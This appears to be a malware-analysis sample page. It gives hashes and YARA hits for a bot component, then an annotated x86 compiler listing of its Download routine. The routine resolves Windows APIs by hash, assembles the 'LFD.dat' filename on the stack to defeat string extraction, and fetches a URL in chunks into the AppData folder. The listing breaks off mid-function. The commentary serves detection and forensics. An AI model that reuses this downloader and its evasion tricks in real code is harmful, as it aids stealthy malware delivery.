
Sample details: e48d0f16d5e09db567c92f586dbc1e14 --

Hashes
MD5: e48d0f16d5e09db567c92f586dbc1e14
SHA1: eef4cc38648820c6bf483e17dc09509f9df80e67
SHA256: 188e5a617953c512791d9b69db3187627190493555260946b77c5e1c4cdf0ff2
SSDEEP: 384:CC+3yYf/EoZ6TCWl9jCBoORiwVpKszkafC9bUfmUZ/QBBKyO/Wwcb6N:7mozwVpKCkMqbU+SUMyOuwcb6N
Details
File Type: BSD
Yara Hits
CuckooSandbox/embedded_win_api | YRP/domain | YRP/contentis_base64 |
Source
http://103.68.190.250/Sources//Advance/BJWJ/Builds/BOT_PLUG/Objs/Release/PackageLoad.cod
Strings
		; Listing generated by Microsoft (R) Optimizing Compiler Version 15.00.30729.01 
	TITLE	e:\Projects\progs\Petrosjan\BJWJ\Source\Misc\PackageLoad.cpp
	.686P
	include listing.inc
	.model	flat
INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES
PUBLIC	??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z ; pushargEx<7,3735721303,453,int,int,int,enum SHGFP_TYPE,wchar_t *>
EXTRN	?GetProcAddressEx2@@YAPAXPADKKH@Z:PROC		; GetProcAddressEx2
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\core\getapi.h
;	COMDAT ??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z
; ---------------------------------------------------------------------
; pushargEx<7, 0deaa9557H, 453>(a1..a5) -- hashed-import call thunk.
; 32-bit x86, cdecl (the thunk ends in `ret 0`, so its caller removes a1..a5).
;
; What the listing shows:
;   1. GetProcAddressEx2(NULL, h=7, hash=0deaa9557H, CacheIndex=453) is called
;      (arguments pushed right to left) and its four dwords are popped.
;   2. a5..a1 are re-pushed and the returned pointer is called through eax.
;      No `add esp` follows, matching the WINAPI typedef on source line 132.
;      The pointer is used as returned; no NULL test is emitted.
;
; Analyst notes:
;   * The call sites in Download and PackageLoad on this page invoke this
;     instantiation as pSHGetFolderPathW. No EXTRN for that API appears in
;     this listing; the only visible link to it is the (h, hash) pair.
;   * What module selector 7 refers to, and how the hash is computed, is
;     defined in getapi.h / GetProcAddressEx2, which is not on this page.
; ---------------------------------------------------------------------
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z PROC ; pushargEx<7,3735721303,453,int,int,int,enum SHGFP_TYPE,wchar_t *>, COMDAT
; 131  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 132  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E);
; 133  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
; Pushed right to left: CacheIndex, hash, h, NULL.
  00003	68 c5 01 00 00	 push	 453			; 000001c5H
  00008	68 57 95 aa de	 push	 -559245993		; deaa9557H
  0000d	6a 07		 push	 7
  0000f	6a 00		 push	 0
  00011	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00016	83 c4 10	 add	 esp, 16			; 00000010H
; 134  : 	return func(a1, a2, a3, a4, a5);
; Forward the caller's five arguments unchanged to the resolved pointer in eax.
  00019	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  0001c	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  0001f	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  00022	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00025	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  00028	ff d0		 call	 eax
; 135  : }
  0002a	5d		 pop	 ebp
  0002b	c3		 ret	 0
??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z ENDP ; pushargEx<7,3735721303,453,int,int,int,enum SHGFP_TYPE,wchar_t *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z
; ---------------------------------------------------------------------
; pushargEx<1, 02ca1b5f0H, 127>(a1, a2) -- hashed-import call thunk.
; 32-bit x86, cdecl, frameless (no ebp frame; arguments are read via esp).
;
; Calls GetProcAddressEx2(NULL, h=1, hash=02ca1b5f0H, CacheIndex=127), then
; calls the returned pointer with (a1, a2). The pointer is used as returned;
; no NULL test is emitted.
;
; Analyst note: the call sites in Download and PackageLoad on this page
; invoke this instantiation as plstrcatW. Module selector 1 and the hash
; algorithm are defined outside this page (getapi.h / GetProcAddressEx2).
; ---------------------------------------------------------------------
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z PROC ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>, COMDAT
; 108  : 	typedef LPVOID (WINAPI *newfunc)(A, B);
; 109  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
; Pushed right to left: CacheIndex, hash, h, NULL.
  00000	6a 7f		 push	 127			; 0000007fH
  00002	68 f0 b5 a1 2c	 push	 748795376		; 2ca1b5f0H
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 110  : 	return func(a1,a2);
; Both pushes encode [esp+8]: esp has moved by 4 after the first push, so the
; same displacement reaches a2 first and then a1.
  00013	ff 74 24 08	 push	 DWORD PTR _a2$[esp-4]
  00017	ff 74 24 08	 push	 DWORD PTR _a1$[esp]
  0001b	ff d0		 call	 eax
; 111  : }
  0001d	c3		 ret	 0
??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z ENDP ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0IPIPBAC@$0BF@PA_WJHHHHH@@YAPAXPA_WJHHHHH@Z ; pushargEx<1,150532354,21,wchar_t *,long,int,int,int,int,int>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0IPIPBAC@$0BF@PA_WJHHHHH@@YAPAXPA_WJHHHHH@Z
; ---------------------------------------------------------------------
; pushargEx<1, 08f8f102H, 21>(a1..a7) -- hashed-import call thunk.
; 32-bit x86, cdecl (`ret 0`; the thunk's caller removes a1..a7).
;
; Calls GetProcAddressEx2(NULL, h=1, hash=08f8f102H, CacheIndex=21), then
; calls the returned pointer with the seven forwarded arguments. The pointer
; is used as returned; no NULL test is emitted.
;
; Analyst note: the interleaved source in Download and PackageLoad on this
; page labels the API reached through (1, 08f8f102H, 21) as pCreateFileW.
; In those two functions the compiler emitted the same lookup inline, so
; this COMDAT copy is not called from them in this listing.
; ---------------------------------------------------------------------
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
_a6$ = 28						; size = 4
_a7$ = 32						; size = 4
??$pushargEx@$00$0IPIPBAC@$0BF@PA_WJHHHHH@@YAPAXPA_WJHHHHH@Z PROC ; pushargEx<1,150532354,21,wchar_t *,long,int,int,int,int,int>, COMDAT
; 147  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 148  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E, F, G);
; 149  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
; Pushed right to left: CacheIndex, hash, h, NULL.
  00003	6a 15		 push	 21			; 00000015H
  00005	68 02 f1 f8 08	 push	 150532354		; 08f8f102H
  0000a	6a 01		 push	 1
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 150  : 	return func(a1, a2, a3, a4, a5, a6, a7);
; Forward the caller's seven arguments unchanged to the resolved pointer in eax.
  00016	ff 75 20	 push	 DWORD PTR _a7$[ebp]
  00019	ff 75 1c	 push	 DWORD PTR _a6$[ebp]
  0001c	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  0001f	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  00022	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  00025	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00028	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  0002b	ff d0		 call	 eax
; 151  : }
  0002d	5d		 pop	 ebp
  0002e	c3		 ret	 0
??$pushargEx@$00$0IPIPBAC@$0BF@PA_WJHHHHH@@YAPAXPA_WJHHHHH@Z ENDP ; pushargEx<1,150532354,21,wchar_t *,long,int,int,int,int,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z ; pushargEx<1,2935475185,37,void *,unsigned long *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z
; ---------------------------------------------------------------------
; pushargEx<1, 0aef7cbf1H, 37>(a1, a2) -- hashed-import call thunk.
; 32-bit x86, cdecl, frameless (arguments are read via esp).
;
; Calls GetProcAddressEx2(NULL, h=1, hash=0aef7cbf1H, CacheIndex=37), then
; calls the returned pointer with (a1, a2). The pointer is used as returned;
; no NULL test is emitted.
;
; Analyst note: the call site in Download on this page invokes this
; instantiation as pGetFileSize(hFile, &dwSizeHigh).
; ---------------------------------------------------------------------
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z PROC ; pushargEx<1,2935475185,37,void *,unsigned long *>, COMDAT
; 108  : 	typedef LPVOID (WINAPI *newfunc)(A, B);
; 109  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
; Pushed right to left: CacheIndex, hash, h, NULL.
  00000	6a 25		 push	 37			; 00000025H
  00002	68 f1 cb f7 ae	 push	 -1359492111		; aef7cbf1H
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 110  : 	return func(a1,a2);
; Both pushes encode [esp+8]; esp moves by 4 between them, so a2 then a1.
  00013	ff 74 24 08	 push	 DWORD PTR _a2$[esp-4]
  00017	ff 74 24 08	 push	 DWORD PTR _a1$[esp]
  0001b	ff d0		 call	 eax
; 111  : }
  0001d	c3		 ret	 0
??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z ENDP ; pushargEx<1,2935475185,37,void *,unsigned long *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z	; pushargEx<1,1033466613,47,int>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z
; ---------------------------------------------------------------------
; pushargEx<1, 03d9972f5H, 47>(a1) -- hashed-import call thunk.
; 32-bit x86, cdecl, frameless (the argument is read via esp).
;
; Calls GetProcAddressEx2(NULL, h=1, hash=03d9972f5H, CacheIndex=47), then
; calls the returned pointer with a1. The pointer is used as returned; no
; NULL test is emitted.
;
; Analyst note: the call site in Download on this page invokes this
; instantiation as pSleep(1000*60), the delay between failed HTTP attempts.
; ---------------------------------------------------------------------
_TEXT	SEGMENT
_a1$ = 8						; size = 4
??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z PROC	; pushargEx<1,1033466613,47,int>, COMDAT
; 100  : 	typedef LPVOID (WINAPI *newfunc)(A);
; 101  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
; Pushed right to left: CacheIndex, hash, h, NULL.
  00000	6a 2f		 push	 47			; 0000002fH
  00002	68 f5 72 99 3d	 push	 1033466613		; 3d9972f5H
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 102  : 	return func(a1);
  00013	ff 74 24 04	 push	 DWORD PTR _a1$[esp-4]
  00017	ff d0		 call	 eax
; 103  : }
  00019	c3		 ret	 0
??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z ENDP	; pushargEx<1,1033466613,47,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z
; ---------------------------------------------------------------------
; pushargEx<1, 0f3fd1c3H, 22>(a1..a5) -- hashed-import call thunk.
; 32-bit x86, cdecl (`ret 0`; the thunk's caller removes a1..a5).
;
; Calls GetProcAddressEx2(NULL, h=1, hash=0f3fd1c3H, CacheIndex=22), then
; calls the returned pointer with the five forwarded arguments. The pointer
; is used as returned; no NULL test is emitted.
;
; Analyst note: the call site in Download on this page invokes this
; instantiation as pWriteFile(hFile, Result, Size, &ButeWriten, NULL), the
; point where HTTP response data reaches disk.
; ---------------------------------------------------------------------
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z PROC ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>, COMDAT
; 131  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 132  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E);
; 133  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
; Pushed right to left: CacheIndex, hash, h, NULL.
  00003	6a 16		 push	 22			; 00000016H
  00005	68 c3 d1 3f 0f	 push	 255840707		; 0f3fd1c3H
  0000a	6a 01		 push	 1
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 134  : 	return func(a1, a2, a3, a4, a5);
; Forward the caller's five arguments unchanged to the resolved pointer in eax.
  00016	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  00019	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  0001c	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  0001f	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00022	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  00025	ff d0		 call	 eax
; 135  : }
  00027	5d		 pop	 ebp
  00028	c3		 ret	 0
??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ENDP ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z	; pushargEx<1,1916711125,17,void *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z
; ---------------------------------------------------------------------
; pushargEx<1, 0723eb0d5H, 17>(a1) -- hashed-import call thunk.
; 32-bit x86, cdecl, frameless (the argument is read via esp).
;
; Calls GetProcAddressEx2(NULL, h=1, hash=0723eb0d5H, CacheIndex=17), then
; calls the returned pointer with a1. The pointer is used as returned; no
; NULL test is emitted.
;
; Analyst note: the call site in Download on this page invokes this
; instantiation as pCloseHandle(hFile).
; ---------------------------------------------------------------------
_TEXT	SEGMENT
_a1$ = 8						; size = 4
??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z PROC	; pushargEx<1,1916711125,17,void *>, COMDAT
; 100  : 	typedef LPVOID (WINAPI *newfunc)(A);
; 101  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
; Pushed right to left: CacheIndex, hash, h, NULL.
  00000	6a 11		 push	 17			; 00000011H
  00002	68 d5 b0 3e 72	 push	 1916711125		; 723eb0d5H
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 102  : 	return func(a1);
  00013	ff 74 24 04	 push	 DWORD PTR _a1$[esp-4]
  00017	ff d0		 call	 eax
; 103  : }
  00019	c3		 ret	 0
??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z ENDP	; pushargEx<1,1916711125,17,void *>
_TEXT	ENDS
PUBLIC	?Download@@YAXPADPA_W@Z				; Download
EXTRN	?Clear@HTTPResponse@@YAXPAUTHTTPResponseRec@@@Z:PROC ; HTTPResponse::Clear
EXTRN	?HTTPFreeRequest@@YAXPAUTHTTPRequestRec@@@Z:PROC ; HTTPFreeRequest
EXTRN	?Free@STR@@YAXPAD@Z:PROC			; STR::Free
EXTRN	?ExecuteMethod@HTTP@@YA_NPAUTHTTPRequestRec@@PAUTResponseData@1@@Z:PROC ; HTTP::ExecuteMethod
EXTRN	?HTTPCreateRequest@@YAPAUTHTTPRequestRec@@PAD@Z:PROC ; HTTPCreateRequest
EXTRN	?m_memset@@YAXPBXEI@Z:PROC			; m_memset
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\misc\packageload.cpp
;	COMDAT ?Download@@YAXPADPA_W@Z
; ---------------------------------------------------------------------
; void Download(char *URL, wchar_t *FileName) -- 32-bit x86, cdecl.
;
; Purpose, as shown by the listing and its interleaved source:
;   Fetches URL in ranged pieces and writes each piece to a local file.
;   * FileName == NULL: the path is SHGetFolderPathW(CSIDL_APPDATA) followed
;     by "\LFD.dat" (CSIDL_APPDATA is the per-user roaming application-data
;     folder).
;   * FileName != NULL: FileName is concatenated onto the zeroed SysPath1 and
;     used as the path.
;   * The file is opened GENERIC_WRITE / FILE_SHARE_WRITE / OPEN_ALWAYS; its
;     current size (low dword only) becomes the starting offset nFileLen.
;   * Each iteration requests [nFileLen, nFileLen + 102400] (STEP = 102400),
;     writes the returned buffer with WriteFile, and adds the bytes written.
;   * HTTP failure: Sleep(60000) and retry; this loop has no attempt limit.
;   * The loop ends when Resp.Response.FullSize is 0 or equals nFileLen.
;
; Register roles (live across the whole function body):
;   ebx = constant 0 (used wherever the source passes 0 / NULL)
;   esi = low dword of nFileLen (the high dword lives at _nFileLen$[ebp+4])
;   edi = R, the request record returned by HTTPCreateRequest
;
; Stack notes:
;   _Result$ and _FileName$ are both offset 12: the Result pointer reuses the
;   FileName argument slot once FileName is no longer needed.
;   Resp offsets used here: +0 Buffer, +4 Size, +12 Response, +52 FullSize.
;
; Analyst notes (detection and forensics):
;   * On-disk artifact when FileName is NULL: LFD.dat directly under the
;     roaming application-data folder.
;   * "\LFD.dat" is assembled on the stack one UTF-16 unit at a time, so it is
;     not stored as a contiguous string constant by this function; plain
;     string extraction over this code will not show it.
;   * Windows APIs are reached only through GetProcAddressEx2 hash lookups; no
;     EXTRN for CreateFileW, WriteFile, etc. appears in this listing.
;   * Nothing in this function inspects or verifies the received bytes before
;     they are written.
;   * How UseRange / StartRange / EndRange are put on the wire is decided in
;     HTTP::ExecuteMethod, which is not on this page -- presumably an HTTP
;     Range header; confirm against that routine.
; ---------------------------------------------------------------------
_TEXT	SEGMENT
_SysPath1$ = -628					; size = 520
_Resp$82948 = -108					; size = 64
_nFileLen$ = -44					; size = 8
_dwSizeHigh$82929 = -36					; size = 4
_Size$82949 = -32					; size = 4
_ButeWriten$82959 = -28					; size = 4
_LoadedFileName$82878 = -24				; size = 18
_hFile$ = -4						; size = 4
_URL$ = 8						; size = 4
_Result$82947 = 12					; size = 4
_FileName$ = 12						; size = 4
?Download@@YAXPADPA_W@Z PROC				; Download, COMDAT
; 7    : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	81 ec 74 02 00
	00		 sub	 esp, 628		; 00000274H
  00009	53		 push	 ebx
; 8    : 	 
; 9    : 	WCHAR SysPath1[MAX_PATH];
; 10   : 	m_memset(SysPath1,0,MAX_PATH);
; The count pushed is 260 while SysPath1 is 520 bytes; ebx is zeroed here and
; stays 0 for the rest of the function.
  0000a	68 04 01 00 00	 push	 260			; 00000104H
  0000f	33 db		 xor	 ebx, ebx
  00011	8d 85 8c fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$[ebp]
  00017	53		 push	 ebx
  00018	50		 push	 eax
  00019	e8 00 00 00 00	 call	 ?m_memset@@YAXPBXEI@Z	; m_memset
  0001e	83 c4 0c	 add	 esp, 12			; 0000000cH
; 11   : 	if (FileName==NULL)
  00021	39 5d 0c	 cmp	 DWORD PTR _FileName$[ebp], ebx
  00024	75 64		 jne	 SHORT $LN8@Download
; 12   : 	{
; 13   : 		WCHAR LoadedFileName[] = {'\\','L','F','D','.','d','a','t',L'\0'};
; Stack-built wide string: each push imm8 / pop eax / mov WORD group stores one
; UTF-16 unit ('\', 'L', 'F', 'D', '.', 'd', 'a', 't'), then a zero terminator.
  00026	6a 5c		 push	 92			; 0000005cH
  00028	58		 pop	 eax
  00029	6a 4c		 push	 76			; 0000004cH
  0002b	66 89 45 e8	 mov	 WORD PTR _LoadedFileName$82878[ebp], ax
  0002f	58		 pop	 eax
  00030	6a 46		 push	 70			; 00000046H
  00032	66 89 45 ea	 mov	 WORD PTR _LoadedFileName$82878[ebp+2], ax
  00036	58		 pop	 eax
  00037	6a 44		 push	 68			; 00000044H
  00039	66 89 45 ec	 mov	 WORD PTR _LoadedFileName$82878[ebp+4], ax
  0003d	58		 pop	 eax
  0003e	6a 2e		 push	 46			; 0000002eH
  00040	66 89 45 ee	 mov	 WORD PTR _LoadedFileName$82878[ebp+6], ax
  00044	58		 pop	 eax
  00045	6a 64		 push	 100			; 00000064H
  00047	66 89 45 f0	 mov	 WORD PTR _LoadedFileName$82878[ebp+8], ax
  0004b	58		 pop	 eax
  0004c	6a 61		 push	 97			; 00000061H
  0004e	66 89 45 f2	 mov	 WORD PTR _LoadedFileName$82878[ebp+10], ax
  00052	58		 pop	 eax
  00053	6a 74		 push	 116			; 00000074H
  00055	66 89 45 f4	 mov	 WORD PTR _LoadedFileName$82878[ebp+12], ax
  00059	58		 pop	 eax
  0005a	66 89 45 f6	 mov	 WORD PTR _LoadedFileName$82878[ebp+14], ax
  0005e	33 c0		 xor	 eax, eax
  00060	66 89 45 f8	 mov	 WORD PTR _LoadedFileName$82878[ebp+16], ax
; 14   : 		pSHGetFolderPathW(NULL, CSIDL_APPDATA, NULL, SHGFP_TYPE_CURRENT, SysPath1);
; 26 (1aH) is CSIDL_APPDATA; ebx supplies the three zero arguments.
  00064	8d 85 8c fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$[ebp]
  0006a	50		 push	 eax
  0006b	53		 push	 ebx
  0006c	53		 push	 ebx
  0006d	6a 1a		 push	 26			; 0000001aH
  0006f	53		 push	 ebx
  00070	e8 00 00 00 00	 call	 ??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z ; pushargEx<7,3735721303,453,int,int,int,enum SHGFP_TYPE,wchar_t *>
; 15   : 		plstrcatW( SysPath1, LoadedFileName );
  00075	8d 45 e8	 lea	 eax, DWORD PTR _LoadedFileName$82878[ebp]
  00078	50		 push	 eax
  00079	8d 85 8c fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$[ebp]
  0007f	50		 push	 eax
  00080	e8 00 00 00 00	 call	 ??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>
; One cleanup covers both cdecl thunk calls above: 5 + 2 dwords = 28 bytes.
  00085	83 c4 1c	 add	 esp, 28			; 0000001cH
; 16   : 	}
; 17   : 	else
  00088	eb 11		 jmp	 SHORT $LN7@Download
$LN8@Download:
; 18   : 	{
; 19   : 		plstrcatW( SysPath1, FileName );
; Caller-supplied name branch: no folder lookup is made; FileName is appended
; to the zeroed SysPath1 and used as given.
  0008a	ff 75 0c	 push	 DWORD PTR _FileName$[ebp]
  0008d	8d 85 8c fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$[ebp]
  00093	50		 push	 eax
  00094	e8 00 00 00 00	 call	 ??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>
  00099	59		 pop	 ecx
  0009a	59		 pop	 ecx
$LN7@Download:
; 20   : 	}
; 21   : 	HANDLE hFile = (HANDLE)pCreateFileW( SysPath1, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0 );
; pCreateFileW is expanded inline: the (1, 08f8f102H, 21) lookup is followed by
; an indirect call. Arguments as pushed: 40000000H = GENERIC_WRITE,
; 2 = FILE_SHARE_WRITE, 4 = OPEN_ALWAYS, 128 = FILE_ATTRIBUTE_NORMAL.
  0009b	6a 15		 push	 21			; 00000015H
  0009d	68 02 f1 f8 08	 push	 150532354		; 08f8f102H
  000a2	6a 01		 push	 1
  000a4	53		 push	 ebx
  000a5	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  000aa	83 c4 10	 add	 esp, 16			; 00000010H
  000ad	53		 push	 ebx
  000ae	68 80 00 00 00	 push	 128			; 00000080H
  000b3	6a 04		 push	 4
  000b5	53		 push	 ebx
  000b6	6a 02		 push	 2
  000b8	68 00 00 00 40	 push	 1073741824		; 40000000H
  000bd	8d 8d 8c fd ff
	ff		 lea	 ecx, DWORD PTR _SysPath1$[ebp]
  000c3	51		 push	 ecx
  000c4	ff d0		 call	 eax
  000c6	89 45 fc	 mov	 DWORD PTR _hFile$[ebp], eax
; 22   : 	LONGLONG nFileLen = 0;
; 23   : 	if (hFile!=INVALID_HANDLE_VALUE)
; Open failure (-1) skips the whole transfer and returns.
  000c9	83 f8 ff	 cmp	 eax, -1
  000cc	0f 84 bc 00 00
	00		 je	 $LN6@Download
; esi and edi are saved only on the success path and restored at $LN15.
  000d2	56		 push	 esi
  000d3	57		 push	 edi
; 24   : 	{
; 25   : 		DWORD dwSizeHigh=0, dwSizeLow=0;
; 26   : 		dwSizeLow = (DWORD)pGetFileSize(hFile, &dwSizeHigh);
  000d4	8d 4d dc	 lea	 ecx, DWORD PTR _dwSizeHigh$82929[ebp]
  000d7	51		 push	 ecx
  000d8	50		 push	 eax
  000d9	89 5d dc	 mov	 DWORD PTR _dwSizeHigh$82929[ebp], ebx
  000dc	e8 00 00 00 00	 call	 ??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z ; pushargEx<1,2935475185,37,void *,unsigned long *>
  000e1	59		 pop	 ecx
; 27   : 
; 28   : 		// nFileLen = ((LONGLONG)dwSizeHigh * (LONGLONG)(4294967295+1)) + (LONGLONG)dwSizeLow;// 
; 29   : 		nFileLen = dwSizeLow;
; Only the low dword of the existing size is kept (esi); the high dword of
; nFileLen is set to 0, so the starting offset is the size modulo 2^32.
  000e2	8b f0		 mov	 esi, eax
  000e4	89 5d d8	 mov	 DWORD PTR _nFileLen$[ebp+4], ebx
$LN18@Download:
; 24   : 	{
; 25   : 		DWORD dwSizeHigh=0, dwSizeLow=0;
; 26   : 		dwSizeLow = (DWORD)pGetFileSize(hFile, &dwSizeHigh);
; Shared cleanup: pops the second pGetFileSize argument on first entry, and the
; single pSleep argument when reached from the `continue` path below.
  000e7	59		 pop	 ecx
$LL5@Download:
; 30   : 
; 31   : 		while (true)
; 32   : 		{
; 33   : 			PHTTPRequestRec R = HTTPCreateRequest(URL);
; A new request record is created on every iteration; edi = R.
  000e8	ff 75 08	 push	 DWORD PTR _URL$[ebp]
  000eb	e8 00 00 00 00	 call	 ?HTTPCreateRequest@@YAPAUTHTTPRequestRec@@PAD@Z ; HTTPCreateRequest
  000f0	8b f8		 mov	 edi, eax
; 34   : 
; 35   : 			R->UseRange = true;
; 36   : 			R->StartRange = (DWORD)nFileLen;
; 37   : 			R->EndRange = (DWORD)(nFileLen+STEP);
; Field stores are interleaved with the m_memset argument pushes below:
; [edi+60] = UseRange (1), [edi+64] = StartRange (esi),
; [edi+68] = EndRange (esi + 102400, i.e. STEP = 102400 bytes).
